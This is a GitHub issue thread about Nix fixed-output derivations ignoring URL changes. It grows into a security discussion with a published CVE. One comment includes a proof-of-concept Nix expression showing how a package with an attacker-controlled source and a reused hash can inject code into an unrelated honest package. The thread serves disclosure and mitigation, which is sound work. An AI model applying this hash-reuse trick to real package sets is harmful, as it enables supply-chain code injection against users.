Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

re-fetch source when url changes #969

Open
magnetophon opened this issue Jul 13, 2016 · 22 comments
Open

re-fetch source when url changes #969

magnetophon opened this issue Jul 13, 2016 · 22 comments
Assignees
Labels
UX The way in which users interact with Nix. Higher level than UI.

Comments

@magnetophon
Copy link
Member

Currently the source is only re-fetched when the hash changes.
When you use nix-env -i to find the new hash, but forget to make a change to the hash, you are stuck with the wrong source.

To add injure to insult: the source is then not re-fetched when you change the hash: you first have to garbage-collect the old source.

@domenkozar
Copy link
Member

In fixed-output derivations, the hash is content addressed. We could get URL to be part of the hash, but then mirror/url change would trigger a rebuild, which is very unfortunate.

I propose you change the workflow how you change sources, but I realize that's poor UX.

@copumpkin
Copy link
Member

I want to better understand the "stuck with the wrong source" thing you mention because I haven't experienced it, but otherwise I'm basically with @domenkozar on this. I don't like the usability aspects either, but I don't know how to retain the nice content-centric properties without something like this.

One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash. This could be stored as a very simple "output-hash -> regular-derivation-hash" KV mapping. Then it could simply warn you that it's seeing the same output hash coming from a different derivation, which isn't necessarily an error but might be interesting to the user.

@magnetophon
Copy link
Member Author

@domenkozar: Could you expand on "I propose you change the workflow how you change sources, but I realize that's poor UX."?

@copumpkin: What I mean is: nix wil write the old source in the store, under the new name.

It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.

@ the both of you: it seems this issue is not as easy to fix as I hoped.
Feel free to close it if you want.

@copumpkin
Copy link
Member

What I mean is: nix wil write the old source in the store, under the new name.
It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.

I'm confused. The way Nix thinks about fixed-output derivations is as follows:

  1. The content + the derivation name (which in some cases isn't provided by the user) are the only things that identify the data in the store.
  2. The other stuff like the URL for fetchurl or the git repo specs for fetchgit, and basically all the scripts that call git or curl or whatever are "hints" for how to produce the content in (1). If the content already exists, the scripts won't be run. If the content doesn't exist, and the script produces data with a different hash, Nix will complain that the hash doesn't match and quit.

So here are the scenarios I can think of:

  1. Content not in store, and you change the hash without changing e.g., the url for fetchurl: Nix will fetch the original URL, check it against the new hash you changed, and complain that the hashes don't match.
  2. Content not in store, and you leave the original hash alone: Nix will fetch the original URL, check against the correct hash, and add the result to the store because they match.
  3. Content in store, and you change the hash without changing the URL: Nix will fetch the original URL, check it against the new hash, and complain that the hashes don't match.
  4. Content in store, and you change the hash and change the URL: Nix will fetch new URL, check against new hash, and accept the new content.

It sounds like you're saying (3) is leaving junk in the store that's identified with the new hash but contains the old data, but that doesn't fit with my understanding of how things work. What am I missing?

@magnetophon
Copy link
Member Author

@copumpkin: I'm talking about when you change the version (or name in general) of the pkg and the url, but not the hash.
afaik in that case it doesn't matter if the content is already in the store, it'll be stored under the new name.

Sorry for the confusion, hope I'm clear now.

@veprbl
Copy link
Member

veprbl commented Jul 17, 2016

I see the opposite in my tests:

Welcome to Nix version 1.11.2. Type :? for help.

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/6zh44fbv7agc7n7il0wprzg6hv1khwha-test.tar.gz.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/zbajq1zcsz90z8dnnfxfi5d1a36kk17l-test.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/dvhk6cw4am7r9rgyjb1q7rwqdww6cns7-test.drv»

I would think that nix shouldn't care about url change as long as the hash stays the same. But in reality the change of the url gives me both redownload and (massive) rebuild.

@domenkozar
Copy link
Member

@veprbl we're talking about the realized derivation hash, not the derivation hash itself.

@freeman42x
Copy link

@magnetophon

I was getting:

nix-store --delete /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
error: cannot delete path ‘/nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16’ since it is still alive

I run:

nix-store -q --roots /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16

And deleted the results folder mentioned by previous command.

After that nix-build picked up the hanged URL.

@stale
Copy link

stale bot commented Feb 15, 2021

I marked this as stale due to inactivity. → More info

@stale stale bot added the stale label Feb 15, 2021
@fricklerhandwerk fricklerhandwerk added UX The way in which users interact with Nix. Higher level than UI. cli The old and/or new command line interface and removed cli The old and/or new command line interface labels Sep 12, 2022
@hab25
Copy link

hab25 commented Dec 22, 2023

I marked this as stale due to inactivity. → More info

To remove the stale label, just leave a new comment.

@stale stale bot removed the stale label Dec 22, 2023
@tobiasBora
Copy link

tobiasBora commented Feb 12, 2024

I was thinking, would it make sense to add an option like --force-redownload that would try to redownload the source of the currently built package, and double check if the hash corresponds? It could help people to quickly check if the hash in a derivation is correct. (EDIT: actually, I think the current behavior brings some security issues, let me test it first)

@lolbinarycat
Copy link

One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash.

doesn't nix already track this for garbage collection purposes? nix-store -q --deriver and nix-store -q --valid-derivers should give you enough information to triangulate this.

@tobiasBora
Copy link

tobiasBora commented Apr 29, 2024

I can confirm that this bug can lead to some security issues, described in an email sent to the security team (I'll likely create a public issue soonish). Other potential attacks (if other functionalities like cache sharing between Ofborg and reviewers/hydra is implemented) are described in NixOS/ofborg#68 (comment)

What I propose to solve this is to keep on each nix installation a map URL -> hash (or rather, as suggested by Linus in a private email, a map derivation -> hash since fixed-output derivations might be much more general than downloading a file). For any fixed-output derivation, if hash is already present on the system, it should first check if the url/derivation is also contained in the database with the appropriate hash. If not, it should re-execute the derivation, check if the hash is correct, and if so continue from the cached value.

EDIT: See my proposition here NixOS/ofborg#68 (comment) for a more robust version

@oxij
Copy link
Member

oxij commented May 6, 2024 via email

@tobiasBora
Copy link

tobiasBora commented May 6, 2024

Yes, I actually realized exactly this morning this issue with fetchzip and transmitted a MWE to the security team showing that one can use the code of any package controlled by an adversary to inject code into any another package, exploiting the fact that fetchzip removes the package name & version in the attribute name, making the attack trivial to carry: the difference between a malicious & honest derivation is juts one hash.

As a result, I submitted a CVE online.

Patching fetchzip as discussed in NixOS/rfcs#171 is only a first step but does not stop the slightly more involved cache poisoning attacks. The only robust fix I can think of is what I am proposing in NixOS/ofborg#68 (comment)

Merging NixOS/nixpkgs#49862, setting nameSourcesPrettily = true or nameSourcesPrettily = "full" by default, and banning of customly-named source derivations is a workaround that will work in the meantime.

That might be a first quick mitigation (actually not needed if we implement NixOS/ofborg#68 (comment)), but not something sufficient. Nobody would realize if a derivation is misnamed, for instance in a long "automatically generating" file.

@oxij
Copy link
Member

oxij commented May 6, 2024 via email

@tobiasBora
Copy link

tobiasBora commented May 7, 2024

I've to admit I don't yet fully grasp all your proposition, but here are a few comments after a first reading:

While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.

Well, I precisely want nix to implement it. All other solutions would either not work or require the user to do massive downloads (if the data don't exist, you have no other way than regenerating it yourself) to check all FOD, which can lead to many issues. Not only the user would need to download the (transitive) sources of all packages they want to install, even if they only care about the final binary, by if the source is not available anymore at its current location then the user would not even be able to install the binary (and the security team mentioned me that they don't want to go this path as it used to be this way and created many issues).

I.e. you are trying to prevent poisoning of your local /nix/store with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) /nix/store directly too by reusing old hashes.

If one changes nix the way I propose, I don't see how anyone could poison Hydra's cache (of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons). The new derivation -> hash map is precisely used to say "Hydra checked that this FOD derivation evaluates to hash", i.e. "no poisoning has been done on this derivation". In particular, old hashes would NOT be part of this trusted map until Hydra checks that they are indeed correct.

setting nameSourcesPrettily = true or nameSourcesPrettily = "full" by default is one work-around for this.

I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance to be sure it is in Hydra' cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.

Nix should remember a mapping of outPath -> set<drvPath> for each valid outPath in /nix/store

I think this is more or less what I proposed, just the maps is in the other way around as I was proposing instead drvPath -> outPath & I also propose to let cache.nixos.org/… share this map.

One possible way to minimize rebuilds […]

What do you call a rebuild here? Is it in the sense that:

  • the FOD output should be re-checked by Hydra, to complete the map drvPath -> outPath (which indeed should be done by hydra if the fetch* function change, and I guess having a lite version of mkDerivation makes sense if these often change)
  • the FOD output should be re-checked by the end user: this should NOT be the case, at least if hydra already did it before and if we implement the sharing of drvPath -> outPath I was proposing above
  • the whole world should be rebuilt: this should NOT be the case, once the user is assured that the hash is correct they can use the old derivation as before.

@oxij
Copy link
Member

oxij commented May 7, 2024 via email

@tobiasBora
Copy link

tobiasBora commented May 10, 2024

What reasons?

Anyone relying on cache.nixos.org (which is likely 99% of users) need to trust Hydra, as if it can always inject malicious code inside the final binary… Like Debian users need to trust Debian maintainers. And I don't see how checking the hash can help here, programs are not FOD and their hash may vary across builds in general, so until we have succinct verifiable honest proof of compilation (which, let's be honest, is never going to happen) or at least 100% reproducible builds, we need to trust hydra.

Anyway, the attack I describe would also apply to people NOT using hydra, so building everything from source will not help since it will pick the wrong source.

If the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.

I think you misunderstand the attack I have in mind. What I describe allows any adversary to inject arbitrarily malicious code (irrespective of the fact of whether the actual program will have a CVE or not) in a future release of any program, assuming they can simply guess the name of the release… which is trivial (these usually simply increase one by one and are often pre-released in an alpha form like 3.42-alpha.

But now, remembering the uncountable number of times I had to fix fixed-output hashes locally

Is it really an experience we want for nix end users?

Was something poisoned already?

Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large so I used a script to help me to discard the good looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.

which would mean frequent mass rebuilds

I don't see why we would get more rebuilds than now. If a program is in the cache, Hydra already downloaded its source, so the user can rely on Hydra's map. If Hydra has not built the package yet… anyway the user needs to rebuild everything. And if the package is a "legacy package" in the sense that it was built by Hydra before we even started to add this option, what I propose (maybe what you propose as well, not sure to understand all details) allows the user to only download & check the source while using the binary compiled by Hydra (which saves most of the time-consuming part).

Precise formats of outputPathToken for different fetch*ers and their security implications could and should be discussed.

I'm not sure to understand all details of your proposition here (maybe because I lack some knowledge of nix's internals) but I think I get the big picture. I think creating equivalent classes of derivations (which, I think, could be a nice concept in general in nix) could be a nice way to limit rebuilds in case of curl updates… but your implementation with outputPathToken raises a number of questions, including in term of security:

  • how can we enforce that a FOD cannot change their own outputPathToken? If any derivation & fetcher can set this option (as it is the case for now as I understand it), this provides basically no additional security as the attacker could always submit an obfuscated FOD that sets outputPathTokens to the one used in fetchgit/… So for this to work outputPathToken must be added by a new mechanism in nix, and not via the usual derivation.
  • the outputPathToken should be an indication of the fetcher, but nix should provide command line options to follow or not these recommendations from the fetcher (either in a more or less paranoid way)
  • if my understanding is correct, outputPathToken alone is not sufficient as it does not assert that the hash is correct. Notably, if I try to execute a derivation, and realize that the provided hash is not correct, one MUST REMOVE this derivation from /nix/store, otherwise we will have no way of knowing if a derivation really evaluates to a given hash.

So based on the first point, since it seems hard to only allow specify fetchers to create a given outputPathToken (unless you know some special tricks?), and since anyway a new nix concept must be introduced, we can maybe deal with this by creating a new kind of derivation that specifies what must be downloaded and not how to obtain it as it is the case for now. For instance, one could create a derivation like:

Derive([
  "kind": "fetchurl",
  "url": "myurl",
  "out": "/nix/store/foo.tar.xz",
  "sha256", "somehash"
])

and nix should automatically understand that when receiving this derivation, it should download the url, using any CURL version they want as soon as the hash matches at the end. If we don't want to hardcode all of them in nix itself (let's try to keep nix small), we can let nix take as input a special nix file trusted-fetchers.nix containing all the "trusted fetchers". This could be a map like kind -> fetcher, such that when nix encounters a custom derivation they are not able to evaluate, nix would resort instead to using the fetcher in the map. This means that we only need to check trusted-fetchers.nix instead of nixpkgs in its totality.

More specifically, fetcher could be a function taking as input the above derivation, and outputting a bit Ok/Not ok (and possibly an error message) and a folder, such that the folder is kept in out by nix iff the bit is true (this bit would be intuitively like "I checked that the hash is correct").

This idea of equivalence of fetchers can certainly be used to also solve other issues with non-deterministic processes. For instance, for now we have no solutions to avoid hash shift with leaveDotGit = true;: NixOS/nixpkgs#8567 and certainly many other package-manager things. One option here would be to create a derivation:

Derive([
  "kind": "fetchgit",
  "url": "git repo",
  "leaveDotGit": true,
  "out": "/nix/store/foo.tar.xz",
  "sha256", "somehash"
])

where the hash only corresponds to the "stable" part of the package, i.e. what is outside .git. The fetcher would then run git clone to clone the package, compute the hash of the "valid" part, and output "OK" if this hash is valid.

But if the user does not use Hydra, and curl changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.

Well, checking the source, I agree it's nice to have… but no need to recompile programs.

@oxij
Copy link
Member

oxij commented May 15, 2024 via email

@nixos-discourse
Copy link

This issue has been mentioned on NixOS Discourse. There might be relevant details there:

https://discourse.nixos.org/t/nixpkgs-supply-chain-security-project/34345/19

@tobiasBora
Copy link

tobiasBora commented May 21, 2024

I'm not sure why my last answer has not been posted. In the meantime the CVE got published at https://nvd.nist.gov/vuln/detail/CVE-2024-36050

Package derivations (<name>) should not be rebuilt, of course.

Good, just wanted to be sure we are on the same basis.

So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.

Definitely agree. My point was just to try to reduce the amount of downloaded materials from the user perspective using the cache when available, otherwise users (especially those with little bandwith) would suffer a lot, and if the source is changed they would get 404 error even if it is still cached.

I'm referencing the exploit described in #969 (comment) there.

I show here a much more generic attack https://github.com/leo-colisson/CVE_NixOs_cache_spoil/ with some variants using fetchurl instead of fetchzip etc. For instance, this:

{ pkgs ? import <nixpkgs> {} }:
pkgs.callPackage ({stdenv, fetchzip}:
  let iconpackage = stdenv.mkDerivation rec {
        pname = "iconpackage";
        version = "42.0";
        src = fetchzip {
          url = "http://localhost:8042/iconpackage-${version}.tar.gz"; # <-- this is controlled by the adversary
          sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
        };
        buildPhase = ":";
        installPhase = ''
          mkdir -p $out/share/icons/hicolor/64x64/apps/
          mv myicon.png $out/share/icons/hicolor/64x64/apps/
        '';     
      };
      honestpackage = stdenv.mkDerivation rec {
        pname = "honestpackage";
        version = "1.0";
        src = fetchzip {
          url = "http://localhost:8042/honestpackage-${version}.tar.gz"; # <-- this is NOT controlled by the adversary
          sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
        };
        buildInputs = [ iconpackage ];
        buildPhase = ":";
        installPhase = ''
          mkdir -p $out/bin
          mv honestpackage.sh $out/bin
        '';
      };
  in honestpackage
) {}

Would result in:

$ nix-build
$ ./result/bin/honestpackage
I am malicious >:-|

In the context I discuss there, say curl changes, now all <name>.src derivations that use fetchurl have to be rebuilt.

Yeah I see now, hence my proposition to have trusted fetchers.

Specifically, yes, outputPathTokens is probably not a good solution when the attacker can also modify the fetch* derivations themselve

Well, they can always do that, for instance by implementing their own FOD derivation, without even relying on a pre-existing fetch* at all.

Making full-featured curl into a Nix builtin is a possibility (as opposed to fetchurlBoot that exists now), but what about derivations fetched with curl and then unpacked with zip […] Is it possible to do? Yes. Is it a desirable solution? Probably not.

That's precisely why I don't want to include this in Nix directly, but provide to nix a trusted-fetcher.nix file via a command line like $ nix --trusted-fetchers trusted-fetchers.nix or simply by picking this file automatically by default. One needs to think carefully about this file, but after a quick thought, it could look like:

{pkgs, ...}: {
  "fetchurl" = {
    args = [ "url" ];
    script = "
      ${pkgs.curl}/bin/curl "$url" -O $tmpOut
      ${pkgs.sha256sum}/bin/sha256sum $tmpOut > $tmpOutSha
    ";
  };
}

This way, when a user calls fetchurl { url = "https://foo.com"; hash = "somehash"; } it would create a derivation like:

Derivation({
  "trustedFetcher": "fetchurl",
  "url": "https://foo.com",
  "hash": "somehash"
})

(see that it is agnostic of curl's version), and to execute it, nix would pick the appropriate fetcher in trusted-fetchers.nix (unless it is already present in the cache), run the corresponding script, and compare at the end the content of $tmpOutSha with the hash in the derivation. If they match, the it derives from the hash of the derivation the final $out and copies $tmpOut to this path.

How are you doing this, exactly? Are you parsing Nix files by hand?

Right now this is made in a very dirty way, via a simple grep (install ripgrep):

import subprocess
import os
import re

for line in os.popen("rg -o 'hash = \".*\"' --no-filename | sort | uniq -c | sort -hr | rg -v \"1 hash\" | rg -o '\".*\"'").readlines():
    print(f"==={line}")
    output = os.popen(f"rg -F '{line.strip()}' -C 5").read()
    res = re.findall(r'owner ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The owner appears twice, sounds good enough here")
        continue
    res = re.findall(r'url ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The url appears twice, sounds good enough here")
        continue
    print(output)
    print("===================================================================\n\n\n")

You can see that the number of duplicated hashes is quite large (155), so I try to discard some of them automatically, for instance if I see the same url twice around the good lines, but this is very dirty, and I don't consider this as any good security measure. Even with this sorting there is quite a lot of entries to manually read, so it would be better to actually extract all such fetch*, and try to run them (without using the local cache of course, not sure how to do) and see if the hash is actually correct…

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
UX The way in which users interact with Nix. Higher level than UI.
Projects
None yet
Development

No branches or pull requests